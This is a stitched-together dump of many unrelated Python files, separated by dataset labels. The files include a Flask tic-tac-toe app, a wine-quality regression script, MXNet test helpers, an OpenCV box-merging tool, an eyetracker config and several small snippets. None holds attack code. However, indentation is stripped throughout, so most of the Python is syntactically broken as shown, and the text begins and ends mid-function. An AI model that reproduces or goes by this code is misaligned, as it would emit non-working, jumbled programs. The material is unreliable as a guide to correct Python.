print('Making Figure S6...')
self._run_preprocessing()
fig = self._plot_figure()
save_figure(fig, self.save_dir, 'FigS6')
print('')
def _run_preprocessing(self):
for expt_str, ab, sc in zip(self.expts,
self.age_bins,
self.sc_status):
# Skip sc- models
if sc == 'sc-':
continue
# Load stats from the holdout data
stats_path = os.path.join(self.model_dir, expt_str,
self.analysis_dir, self.stats_fn)
with open(stats_path, 'rb') as path:
expt_stats = pickle.load(path)
# Load fixed points
fp_path = os.path.join(self.model_dir, expt_str,
self.analysis_dir, self.fp_fn)
with open(fp_path, 'rb') as path:
fps = pickle.load(path)
self.all_stats[ab].append(expt_stats)
self.all_fps[ab].append(fps)
def _plot_figure(self):
fig = plt.figure(figsize=self.figsize, dpi=self.figdpi)
nrows = 5
t_post = 1200
elev, azim = 30, 60
for ab_ind, ab in enumerate(self.plot_age_bins):
this_stats = self.all_stats[ab]
this_fps = self.all_fps[ab]
this_means = np.array([s.summary_stats['u_mean_rt']
for s in this_stats])
sort_inds = np.argsort(this_means)
plot_inds = np.arange(0, len(sort_inds), 20 // nrows)
for ax_ind, p in enumerate(plot_inds):
subplot_ind = ax_ind * 3 + ab_ind + 1
ax = fig.add_subplot(nrows, 3, subplot_ind, projection='3d')
plot_stats = this_stats[sort_inds[p]]
plot_fps = this_fps[sort_inds[p]]
# Plot
if ax_ind == 0 and ab_ind == 0:
kwargs = {'annotate': True}
else:
kwargs = {'annotate': False}
plotter = PlotModelLatents(plot_stats, post_on_dur=t_post,
fixed_points=plot_fps, plot_pre_onset=False)
ax = plotter.plot_main_conditions(ax, elev=elev, azim=azim,
**kwargs)
if ax_ind == 0:
ax.set_title(self.plot_titles[ab_ind])
return fig
|
nilq/baby-python
|
python
|
import random
from flask import render_template, redirect, flash, url_for, request, jsonify
from flask_login import login_user, logout_user, current_user, login_required
from sqlalchemy import desc
from app import app, db, login_manager, forms
from app.models import User, Game, GameMove
from app.decorators import not_in_game
@app.route("/")
@login_required
@not_in_game
def index():
games_in_wait = Game.query.filter_by(state=Game.game_state['waiting_for_players']).limit(5)
games_in_progress = Game.query.filter_by(state=Game.game_state['in_progress']).limit(5)
return render_template('index.html', games_in_progress=games_in_progress, games_in_wait=games_in_wait)
@app.route("/login", methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('index'))
if request.method == 'POST':
form = forms.LoginForm(request.form)
else:
form = forms.LoginForm()
if form.validate_on_submit():
user = User.get_authenticated_user(form.username.data, form.password.data)
if user:
login_user(user)
return redirect(url_for('index'))
    flash('Cannot find this combination of username and password')
return render_template('login.html', login_form=form)
@app.route("/logout", methods=['POST'])
def logout():
logout_user()
return redirect(url_for('index'))
@app.route("/register", methods=['GET', 'POST'])
def register():
if request.method == 'POST':
form = forms.RegisterForm(request.form)
else:
form = forms.RegisterForm()
if form.validate_on_submit():
user = User(form.username.data, form.password.data, form.email.data)
db.session.add(user)
db.session.commit()
login_user(user)
# Redirect to homepage, if user is successfully authenticated
if current_user.is_authenticated:
        flash('Welcome to Tic-Tac-Toe!', 'success')
return redirect(url_for('index'))
return render_template('register.html', register_form=form)
@app.route("/game/new", methods=['GET', 'POST'])
@login_required
@not_in_game
def new_game():
if request.method == 'POST':
form = forms.NewGameForm(request.form)
else:
form = forms.NewGameForm()
if form.validate_on_submit():
# generate random players order in game
user_order = random.choice([1, 2])
if user_order == 1:
game = Game(field_size=form.size.data, win_length=form.rule.data, player1=current_user)
else:
game = Game(field_size=form.size.data, win_length=form.rule.data, player2=current_user)
db.session.add(game)
db.session.commit()
return redirect(url_for('show_game', game_id=game.id))
return render_template('new_game.html', new_game_form=form)
@app.route("/game/join/<int:game_id>", methods=['POST'])
@login_required
def join_game(game_id):
game = Game.query.get_or_404(game_id)
if game.player1_id and game.player2:
# redirect back to the game if it's full
flash('Current game is already in progress')
return redirect(url_for('show_game', game_id=game_id))
# check available player position in game
if game.player1_id is None:
game.player1 = current_user
else:
game.player2 = current_user
game.state = Game.game_state['in_progress']
db.session.commit()
return redirect(url_for('show_game', game_id=game_id))
@app.route("/game/flee", methods=['POST'])
@login_required
def flee_game():
game = current_user.current_game
# if there is no game to flee, redirect to homepage
if not game:
flash('There is no game to flee')
return redirect(url_for('index'))
game.state = Game.game_state['finished']
if game.player1_id == current_user.id:
opponent = game.player2
result = Game.game_result['player_two_win']
else:
opponent = game.player1
result = Game.game_result['player_one_win']
# if there was a second player in a game, let him win
if opponent:
game.result = result
db.session.commit()
return redirect(url_for('index'))
@app.route("/game/<int:game_id>", methods=['GET'])
@login_required
@not_in_game
def show_game(game_id):
game = Game.query.get_or_404(game_id)
if game.player1_id == current_user.id:
player_number = 1
elif game.player2_id == current_user.id:
player_number = 2
else:
# Spectator
player_number = current_user.id + 100 # simple unique spectator id
return render_template('game.html', game=game, player_number=player_number)
@app.route("/profile/<int:user_id>", methods=['GET'])
@login_required
@not_in_game
def user_profile(user_id):
last_games_limit = 25
finished = Game.game_state['finished']
user = User.get_user_by_id(user_id)
games = user.games.filter(Game.state == finished)\
.filter(Game.player1_id)\
.filter(Game.player2_id)\
.order_by(desc(Game.id)).limit(last_games_limit)
return render_template('profile.html', games=games, user=user)
@app.route("/gamearchive/<int:game_id>", methods=['GET'])
@login_required
@not_in_game
def show_archived_game(game_id):
game = Game.query.get_or_404(game_id)
player_number = current_user.id + 100 # unique spectator id
template = 'archive_game.html'
if game.state != Game.game_state['finished']:
template = 'game.html'
return render_template(template, game=game, player_number=player_number)
@app.route("/game/<int:game_id>/json", methods=['GET'])
def get_game_data(game_id):
game = Game.query.get_or_404(game_id)
players = []
for index, player_name in enumerate((game.player1.username, game.player2.username)):
player = {
'name': player_name,
'player_number': index + 1
}
players.append(player)
moves = list(map(GameMove.dic, game.moves))
return jsonify(moves=moves, players=players)
@login_manager.user_loader
def load_user(userid):
return User.get_user_by_id(userid)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 15 15:49:57 2018
@author: pranavjain
This model predicts the quality of red wine. An optimal model is then built using Backward Elimination.
Required Data to predict
Fixed acidity
Volatile acidity
Citric acid
Residual sugar
Chlorides
Free sulphur dioxide
Total sulphur dioxide
Density
pH
Sulphates
Alcohol
"""
# Importing the libraries
import numpy as np
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('winequality-red.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, 11].values
# Deprecation warnings call for reshaping of single feature arrays with reshape(-1,1)
y = y.reshape(-1,1)
# avoid DataConversionError
y = y.astype(float)
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature Scaling
"""from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
sc_y = StandardScaler()
y_train = sc_y.fit_transform(y_train)
y_test = sc_y.transform(y_test)"""
# Fitting Multiple Linear Regression to the Training set
from sklearn.linear_model import LinearRegression
regressor = LinearRegression()
regressor.fit(X_train, y_train)
# Predicting the Test set results
y_pred = regressor.predict(X_test)
# Building the optimal model using Backward Elimination
# consider p-value < 0.05
import statsmodels.api as sm
X = np.append(arr = np.ones((1599, 1)).astype(float), values = X, axis = 1)
X_opt = X[:, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'density'
X_opt = X[:, [0, 1, 2, 3, 4, 5, 6, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'fixed acidity'
X_opt = X[:, [0, 2, 3, 4, 5, 6, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'residual sugar'
X_opt = X[:, [0, 2, 3, 5, 6, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'citric acid'
X_opt = X[:, [0, 2, 5, 6, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'free sulphur dioxide'
X_opt = X[:, [0, 2, 5, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# hence the optimal model is now ready
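# The manual elimination above can be automated; here is a rough, illustrative sketch (the
# backward_elimination helper and the sm_api alias are not part of the original script) that
# drops the least significant feature and refits until every remaining p-value is below 0.05:
import statsmodels.api as sm_api
def backward_elimination(features, target, significance_level=0.05):
    columns = list(range(features.shape[1]))
    while columns:
        model = sm_api.OLS(endog=target, exog=features[:, columns]).fit()
        worst = int(np.argmax(model.pvalues))
        if model.pvalues[worst] <= significance_level:
            return columns, model
        del columns[worst]  # drop the column with the highest p-value and refit
X_opt_columns, final_model = backward_elimination(X, y)
final_model.summary()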
|
nilq/baby-python
|
python
|
from mqtt_panel.web.component import Component
class Modal(Component):
def __init__(self):
super().__init__(4)
def _body(self, fh):
self._write_render(fh, '''\
<div id="modal" class="d-none"></div>
''', indent=self._indent)
|
nilq/baby-python
|
python
|
from gym_gazebo2.envs.MARA.mara import MARAEnv
from gym_gazebo2.envs.MARA.mara_random import MARARandEnv
from gym_gazebo2.envs.MARA.mara_real import MARARealEnv
from gym_gazebo2.envs.MARA.mara_camera import MARACameraEnv
from gym_gazebo2.envs.MARA.mara_orient import MARAOrientEnv
from gym_gazebo2.envs.MARA.mara_collision import MARACollisionEnv
from gym_gazebo2.envs.MARA.mara_collision_orient import MARACollisionOrientEnv
|
nilq/baby-python
|
python
|
# Dependencies
import requests as req
from config import api_key
url = f"http://www.omdbapi.com/?apikey={api_key}&t="
# Who was the director of the movie Aliens?
movie = req.get(url + "Aliens").json()
print("The director of Aliens was " + movie["Director"] + ".")
# What was the movie Gladiator rated?
movie = req.get(url + "Gladiator").json()
print("The rating of Gladiator was " + movie["Rated"] + ".")
# What year was 50 First Dates released?
movie = req.get(url + "50 First Dates").json()
print("The movie 50 First Dates was released in " + movie["Year"] + ".")
# Who wrote Moana?
movie = req.get(url + "Moana").json()
print("Moana was written by " + movie["Writer"] + ".")
# What was the plot of the movie Sing?
movie = req.get(url + "Sing").json()
print("The plot of Sing was: '" + movie["Plot"] + "'.")
# BONUS: Complete this activity with a loop.
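# One way to complete the bonus with a loop (a sketch reusing the same url and fields queried above):
movie_queries = [
    ("Aliens", "Director", "The director of Aliens was {}."),
    ("Gladiator", "Rated", "The rating of Gladiator was {}."),
    ("50 First Dates", "Year", "The movie 50 First Dates was released in {}."),
    ("Moana", "Writer", "Moana was written by {}."),
    ("Sing", "Plot", "The plot of Sing was: '{}'."),
]
for title, field, template in movie_queries:
    movie = req.get(url + title).json()
    print(template.format(movie[field]))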
|
nilq/baby-python
|
python
|
"""Clean Code in Python - Chapter 9: Common Design Patterns
> Monostate Pattern
"""
from log import logger
class SharedAttribute:
def __init__(self, initial_value=None):
self.value = initial_value
self._name = None
def __get__(self, instance, owner):
if instance is None:
return self
if self.value is None:
raise AttributeError(f"{self._name} was never set")
return self.value
def __set__(self, instance, new_value):
self.value = new_value
def __set_name__(self, owner, name):
self._name = name
class GitFetcher:
current_tag = SharedAttribute()
current_branch = SharedAttribute()
def __init__(self, tag, branch=None):
self.current_tag = tag
self.current_branch = branch
def pull(self):
logger.info("pulling from %s", self.current_tag)
return self.current_tag
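# Minimal usage sketch (illustrative only, not part of the original module): because
# current_tag/current_branch are SharedAttribute descriptors stored on the class, every
# GitFetcher instance sees the same values, which is the monostate behaviour.
if __name__ == "__main__":
    f1 = GitFetcher("0.1")
    f2 = GitFetcher("0.2")
    f1.current_tag = "0.3"
    assert f2.current_tag == "0.3"  # state is shared across instances
    f2.pull()  # logs "pulling from 0.3"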
|
nilq/baby-python
|
python
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
# ==============================================================================
import mxnet as mx
from unittest.mock import Mock
import os
import numpy as np
import zipfile
import random
import glob
MXNET_MODEL_ZOO_PATH = 'http://data.mxnet.io/models/imagenet/'
class RepurposerTestUtils:
ERROR_INCORRECT_INPUT = 'Test case assumes incorrect input'
VALIDATE_REPURPOSE_METHOD_NAME = '_validate_before_repurpose'
VALIDATE_PREDICT_METHOD_NAME = '_validate_before_predict'
LAYER_FC1 = 'fc1'
LAYER_RELU = 'relu1'
LAYER_FC2 = 'fc2'
LAYER_SOFTMAX = 'softmax'
ALL_LAYERS = [LAYER_FC1, LAYER_RELU, LAYER_FC2, LAYER_SOFTMAX]
META_MODEL_REPURPOSER_MODEL_HANDLER_CLASS = 'xfer.meta_model_repurposer.ModelHandler'
MNIST_MODEL_PATH_PREFIX = 'tests/data/test_mnist_model'
@staticmethod
def create_mxnet_module():
# Define an mxnet Module with 2 layers
data = mx.sym.Variable('data')
fc1 = mx.sym.FullyConnected(data, name=RepurposerTestUtils.LAYER_FC1, num_hidden=64)
relu1 = mx.sym.Activation(fc1, name=RepurposerTestUtils.LAYER_RELU, act_type="relu")
fc2 = mx.sym.FullyConnected(relu1, name=RepurposerTestUtils.LAYER_FC2, num_hidden=5)
out = mx.sym.SoftmaxOutput(fc2, name=RepurposerTestUtils.LAYER_SOFTMAX)
return mx.mod.Module(out)
@staticmethod
def get_mock_model_handler_object():
mock_model_handler = Mock()
mock_model_handler.layer_names = RepurposerTestUtils.ALL_LAYERS
return mock_model_handler
@staticmethod
def get_image_iterator():
image_list = [[0, 'accordion/image_0001.jpg'], [0, 'accordion/image_0002.jpg'], [1, 'ant/image_0001.jpg'],
[1, 'ant/image_0002.jpg'], [2, 'anchor/image_0001.jpg'], [2, 'anchor/image_0002.jpg']]
return mx.image.ImageIter(2, (3, 224, 224), imglist=image_list, path_root='tests/data/test_images',
label_name='softmax_label')
@staticmethod
def _assert_common_attributes_equal(repurposer1, repurposer2):
assert repurposer1.__dict__.keys() == repurposer2.__dict__.keys()
assert repurposer1._save_source_model_default == repurposer2._save_source_model_default
RepurposerTestUtils.assert_provide_equal(repurposer1.provide_data, repurposer2.provide_data)
RepurposerTestUtils.assert_provide_equal(repurposer1.provide_label, repurposer2.provide_label)
assert repurposer1.get_params() == repurposer2.get_params()
@staticmethod
def assert_provide_equal(provide1, provide2):
if provide1 is None:
assert provide2 is None
return
assert len(provide1) == len(provide2)
assert provide1[0][0] == provide2[0][0]
assert len(provide1[0][1]) == len(provide2[0][1])
@staticmethod
def _remove_files_with_prefix(prefix):
for filename in os.listdir('.'):
if filename.startswith(prefix):
os.remove(filename)
@staticmethod
def download_vgg19():
# Download vgg19 (trained on imagenet)
[mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'vgg/vgg19-0000.params'),
mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'vgg/vgg19-symbol.json')]
@staticmethod
def download_squeezenet():
# Download squeezenet (trained on imagenet)
[mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'squeezenet/squeezenet_v1.1-0000.params'),
mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'squeezenet/squeezenet_v1.1-symbol.json')]
@staticmethod
def download_resnet():
        # Download resnet (trained on imagenet)
[mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'resnet/101-layers/resnet-101-0000.params'),
mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'resnet/101-layers/resnet-101-symbol.json')]
@staticmethod
def unzip_mnist_sample():
zip_ref = zipfile.ZipFile('tests/data/mnist_sample.zip', 'r')
zip_ref.extractall('.')
zip_ref.close()
@staticmethod
def create_img_iter(data_dir, batch_size, label_name='softmax_label'):
# assert dir exists
if not os.path.isdir(data_dir):
raise ValueError('Directory not found: {}'.format(data_dir))
# get class names
classes = [x.split('/')[-1] for x in glob.glob(data_dir+'/*')]
classes.sort()
fnames = []
labels = []
for c in classes:
# get all the image filenames and labels
images = glob.glob(data_dir+'/'+c+'/*')
images.sort()
fnames += images
labels += [c]*len(images)
# create imglist for ImageIter
imglist = []
for label, filename in zip(labels, fnames):
imglist.append([int(label), filename])
random.shuffle(imglist)
# make iterators
iterator = mx.image.ImageIter(batch_size, (3, 224, 224), imglist=imglist, label_name=label_name, path_root='')
return iterator
@staticmethod
def get_labels(iterator):
iterator.reset()
labels = []
while True:
try:
labels = labels + iterator.next().label[0].asnumpy().astype(int).tolist()
except StopIteration:
break
return labels
@staticmethod
def assert_feature_indices_equal(expected_feature_indices, actual_feature_indices):
if not type(expected_feature_indices) == type(actual_feature_indices):
raise AssertionError("Incorrect feature_indices type: {}. Expected: {}"
.format(type(actual_feature_indices), type(expected_feature_indices)))
if not expected_feature_indices.keys() == actual_feature_indices.keys():
raise AssertionError("Incorrect keys in feature_indices: {}. Expected: {}"
.format(actual_feature_indices.keys(), expected_feature_indices.keys()))
for key in expected_feature_indices:
if not np.array_equal(expected_feature_indices[key], actual_feature_indices[key]):
raise AssertionError("Incorrect values in feature_indices dictionary")
@staticmethod
def create_mnist_test_iterator():
# Create data iterator for mnist test images
return mx.io.MNISTIter(image='tests/data/t10k-images-idx3-ubyte', label='tests/data/t10k-labels-idx1-ubyte')
|
nilq/baby-python
|
python
|
# Eyetracker type
# EYETRACKER_TYPE = "IS4_Large_Peripheral" # 4C eyetracker
#EYETRACKER_TYPE = "Tobii T120" # Old eyetracker
EYETRACKER_TYPE = "simulation" # test
# EYETRACKER_TYPE = "Tobii Pro X3-120 EPU" # Tobii X3
SCREEN_SIZE_X = 1920
SCREEN_SIZE_Y = 1080
#Pilot condition
PILOT_CONDITION_TEXT_INTERVENTION = True
PILOT_CONDITION_NO_REMOVAL = True
#PILOT_CONDITION_NO_REMOVAL = False
#PILOT mmd subset to load
#PILOT_MMD_SUBSET = [3,9,11,20,27,60,74] #try and ensure 74 is in removal
#PILOT_MMD_SUBSET = [5,28,30,62,66,72,76]
PILOT_MMD_SUBSET = [5]
# Project paths:
# Reference highlighting rules
#RUN USING: python -u experimenter_platform_stage_1_demo.py
if PILOT_CONDITION_TEXT_INTERVENTION:
USER_MODEL_STATE_PATH = "./database/user_model_state_ref_highlight.db"
else:
USER_MODEL_STATE_PATH = "./database/user_model_state_ref_highlight.db"
# GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_and_text.db"
if PILOT_CONDITION_TEXT_INTERVENTION:
GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_and_text_pilot_noremoval.db"
else:
if PILOT_CONDITION_NO_REMOVAL:
GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_pilot_noremoval_test.db"
else:
GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_pilot_removal.db"
# Project paths:
# Reference highlighting rules - SD testing
#RUN USING: python -u experimenter_platform_study_bars_SD.py
#USER_MODEL_STATE_PATH = "./database/user_model_state_ref_highlight_SD.db"
#GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_SD_bold1.db"
# Legend highlighting rules
#RUN USING: python -u experimenter_platform_study_1.py
#GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_legend_highlighting.db"
#USER_MODEL_STATE_PATH = "./database/user_model_state_legend_highlighting.db"
FRONT_END_STATIC_PATH = "./application/frontend/static/"
FRONT_END_TEMPLATE_PATH = "./application/frontend/templates/"
# Platform configuration:
USE_FIXATION_ALGORITHM = True
USE_EMDAT = False
USE_ML = False
USE_KEYBOARD = False
USE_MOUSE = False
# Features to use
USE_PUPIL_FEATURES = True
USE_DISTANCE_FEATURES = True
USE_FIXATION_PATH_FEATURES = True
USE_TRANSITION_AOI_FEATURES = True
# Sets of features to keep
KEEP_TASK_FEATURES = False
KEEP_GLOBAL_FEATURES = False
#Frequency of ML/EMDAT calls:
EMDAT_CALL_PERIOD = 10000
ML_CALL_PERIOD = 6000000
# Some parameter from EMDAT
MAX_SEG_TIMEGAP= 10
# Fixation detector parameters
FIX_MAXDIST = 35
FIX_MINDUR = 100000
REST_PUPIL_SIZE = 0
PUPIL_ADJUSTMENT = "rpscenter"
# The amount of time to wait after starting a new task before starting recording
# fixations (to account for html loading time)
FIX_DETECTION_DELAY = 1000000
#Logs configuration
LOG_PREFIX = "./log/AdaptiveMSNV_log"
# Mouse events
MAX_DOUBLE_CLICK_DUR = 500000
|
nilq/baby-python
|
python
|
#-
# Copyright (c) 2013 Robert M. Norton
# All rights reserved.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
from beritest_tools import BaseBERITestCase
from nose.plugins.attrib import attr
# Register assignment:
# a0 - desired epc 1
# a1 - actual epc 1
# a2 - desired badvaddr 1
# a3 - actual badvaddr 1
# a4 - cause 1
# a5 - desired epc 2
# a6 - actual epc 2
# a7 - desired badvaddr 2
# s0 - actual badvaddr 2
# s1 - cause 2
class test_tlb_addrerr_store(BaseBERITestCase):
@attr('tlb')
def test_epc1(self):
self.assertRegisterEqual(self.MIPS.a0, self.MIPS.a1, "Wrong EPC 1")
@attr('tlb')
def test_badvaddr1(self):
'''Test BadVAddr after load from bad user space address'''
self.assertRegisterEqual(self.MIPS.a2, self.MIPS.a3, "Wrong badaddr 1")
@attr('tlb')
def test_cause1(self):
self.assertRegisterMaskEqual(self.MIPS.a4, 0xff, 0x14, "Wrong cause 1")
@attr('tlb')
def test_epc2(self):
self.assertRegisterEqual(self.MIPS.a5, self.MIPS.a6, "Wrong EPC 2")
@attr('tlb')
def test_badvaddr2(self):
'''Test BadVAddr after load from bad kernel space address'''
self.assertRegisterEqual(self.MIPS.a7, self.MIPS.s0, "Wrong badaddr 2")
@attr('tlb')
def test_cause2(self):
self.assertRegisterMaskEqual(self.MIPS.s1, 0xff, 0x14, "Wrong cause 2")
|
nilq/baby-python
|
python
|
import os
import telebot
token = os.environ['TELEGRAM_TOKEN']
bot = telebot.TeleBot(token)
def medit(message_text,chat_id, message_id,reply_markup=None,parse_mode=None):
return bot.edit_message_text(chat_id=chat_id,message_id=message_id,text=message_text,reply_markup=reply_markup,
parse_mode=parse_mode)
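# Hypothetical usage sketch (the chat id and message below are assumptions for illustration):
# sent = bot.send_message(chat_id=123456789, text="Working...")
# medit("Done!", chat_id=sent.chat.id, message_id=sent.message_id, parse_mode="HTML")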
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
#
# Tencent is pleased to support the open source community by making QT4C available.
# Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved.
# QT4C is licensed under the BSD 3-Clause License, except for the third-party components listed below.
# A copy of the BSD 3-Clause License is included in this file.
#
'''QT4C(Client Driver for QTA)
'''
|
nilq/baby-python
|
python
|
from spire.mesh import ModelController
from spire.schema import SchemaDependency
from platoon import resources
from platoon.models import *
class QueueController(ModelController):
resource = resources.Queue
version = (1, 0)
mapping = 'id subject name status'
model = Queue
schema = SchemaDependency('platoon')
def create(self, request, response, subject, data):
session = self.schema.session
subject = self.model.create(session, **data)
session.commit()
response({'id': subject.id})
def update(self, request, response, subject, data):
if not data:
return response({'id': subject.id})
session = self.schema.session
subject.update(session, **data)
session.commit()
response({'id': subject.id})
def _annotate_resource(self, request, model, resource, data):
endpoint = model.endpoint
if endpoint:
resource['endpoint'] = endpoint.extract_dict(exclude='id endpoint_id',
drop_none=True)
|
nilq/baby-python
|
python
|
import argparse
import shutil
import errno
import time
import glob
import os
import cv2
import numpy as np
from merge_tools import do_merge_box
DEBUG = True
class MergeBox(object):
def __init__(self):
args = self.parse_arguments()
self.output_dir = args.output_dir
self.input_dir = args.input_dir
def parse_arguments(self):
"""
Parse the command line arguments of the program.
"""
parser = argparse.ArgumentParser(
description="生成labelme 格式数据"
)
parser.add_argument(
"-o",
"--output_dir",
type=str,
nargs="?",
help="输出文件的本地路径",
required=True
)
parser.add_argument(
"-i",
"--input_dir",
type=str,
nargs="?",
help="输入文件路径",
required=True
)
return parser.parse_args()
def parse_file_list(self, input_dir, output_dir):
"""
"""
label_file_list = glob.glob(os.path.join(input_dir, '*.txt'))
for label_file in label_file_list:
real_name = label_file.split('/')[-1].split('.')[0]
image_file = os.path.join(input_dir, "{}.jpg".format(real_name))
label_image_file = os.path.join(output_dir, "{}.jpg".format(real_name))
print(image_file)
if os.path.exists(image_file):
self.draw_box(label_file, image_file, label_image_file)
def draw_box(self, label_file, image_file, label_image_file):
if not os.path.exists(label_file) or not os.path.exists(image_file):
            print('[Warning] File does not exist --------file: {} '.format(label_file))
return
with open(label_file, 'r', encoding='utf-8') as f:
lines = f.readlines()
lines = do_merge_box(lines)
bg_image = cv2.imread(image_file)
raw_image = cv2.imread(image_file)
for index, line in enumerate(lines):
if len(line) < 8:
continue
points = line.split(',')
left = int(points[0]) if int(points[6]) > int(points[0]) else int(points[6])
right = int(points[2]) if int(points[4]) < int(points[2]) else int(points[4])
top = int(points[1]) if int(points[3]) > int(points[1]) else int(points[3])
bottom = int(points[5]) if int(points[7]) < int(points[5]) else int(points[7])
height = bottom - top
width = right - left
colors = (0, 0, 255)
if index == 189:
print(line)
print("left={} right={} top={} bottom={}".format(left, right, top, bottom))
# cv2.fillPoly(bg_image, [pts], (255, 255, 255))
roi_corners=np.array([[(int(points[0]), int(points[1])),
(int(points[2]), int(points[3])),
(int(points[4]), int(points[5])),
(int(points[6]), int(points[7]))]], dtype=np.int32)
            mask = np.zeros(bg_image.shape, dtype=np.uint8)
            channels = bg_image.shape[2]
            # coordinates of the input points define the polygon region to keep
            channel_count = channels
            ignore_mask_color = (255,) * channel_count
            # create the mask layer
            cv2.fillPoly(mask, roi_corners, ignore_mask_color)
            # AND every pixel with the mask; everything outside the mask region becomes 0
            masked_image = cv2.bitwise_and(bg_image, mask)
c_img = masked_image[top: int(top + height), left: int(left + width)]
cv2.imwrite(os.path.join(self.output_dir, '{}.jpg'.format(index)), c_img)
            # draw the bounding box outline
pts = np.array([[int(points[0]), int(points[1])],
[int(points[2]), int(points[3])],
[int(points[4]), int(points[5])],
[int(points[6]), int(points[7])]], np.int32) # 每个点都是(x, y)
pts = roi_corners.reshape((-1, 1, 2))
cv2.polylines(bg_image, [pts], True, (0, 0, 255))
# cv2.rectangle(bg_image, (left, top), (left+width, top+height), colors, 1)
cv2.imwrite(label_image_file, bg_image)
            print('[Output] Generated the annotated image {} .'.format(label_image_file))
def main(self):
time_start = time.time()
# Argument parsing
args = self.parse_arguments()
if os.path.exists(args.output_dir):
shutil.rmtree(args.output_dir)
try:
os.makedirs(args.output_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
if not os.path.exists(args.input_dir):
print("输入路径不能为空 input_dir[{}] ".format(args.input_dir))
return
self.parse_file_list(args.input_dir, args.output_dir)
time_elapsed = time.time() - time_start
print('The code run {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
if __name__ == "__main__":
mergeBox = MergeBox()
mergeBox.main()
|
nilq/baby-python
|
python
|
"""Tests"""
import unittest
from html_classes_obfuscator import html_classes_obfuscator
class TestsGenerateCSS(unittest.TestCase):
"""Tests
Args:
unittest (unittest.TestCase): Unittest library
"""
def test_generate_css_simple_case(self) -> None:
"""Test"""
new_css = html_classes_obfuscator.generate_css('.hello{color:blue}', {"hello": "test_1"})
expected_new_css = '.test_1{color:blue}'
self.assertEqual(new_css, expected_new_css)
def test_generate_css_double_case(self) -> None:
"""Test"""
new_css = html_classes_obfuscator.generate_css('.hello .world{color:blue}', {"hello": "test_1", "world": "test_2"})
expected_new_css = '.test_1 .test_2{color:blue}'
self.assertEqual(new_css, expected_new_css)
def test_generate_css_tailwind_case(self) -> None:
"""Test"""
new_css = html_classes_obfuscator.generate_css(r'.lg\:1\/4{color:blue}', {"lg:1/4": "test_1"})
expected_new_css = '.test_1{color:blue}'
self.assertEqual(new_css, expected_new_css)
def test_generate_css_pseudo_elements_case(self) -> None:
"""Test"""
new_css = html_classes_obfuscator.generate_css('.hello .world:not(.not_me, div){color:blue}', {"hello": "test_1", "world": "test_2", "not_me": "test_3"})
expected_new_css = '.test_1 .test_2:not(.test_3, div){color:blue}'
self.assertEqual(new_css, expected_new_css)
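# Convenience entry point (an assumed invocation style) so the tests can also be run directly:
if __name__ == "__main__":
    unittest.main()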
|
nilq/baby-python
|
python
|
import urllib.request
def obtain_webpage(url: str):
return urllib.request.urlopen(url)
|
nilq/baby-python
|
python
|
filepath = 'Prometheus_Unbound.txt'
with open(filepath) as fp:
line = fp.readline()
cnt = 1
while line:
print("Line {}: {}".format(cnt, line.strip()))
line = fp.readline()
cnt += 1
|
nilq/baby-python
|
python
|
# Time: O(nlogn)
# Space: O(n)
import collections
# hash, sort
class Solution(object):
def findWinners(self, matches):
"""
:type matches: List[List[int]]
:rtype: List[List[int]]
"""
lose = collections.defaultdict(int)
players_set = set()
for x, y in matches:
lose[y] += 1
players_set.add(x)
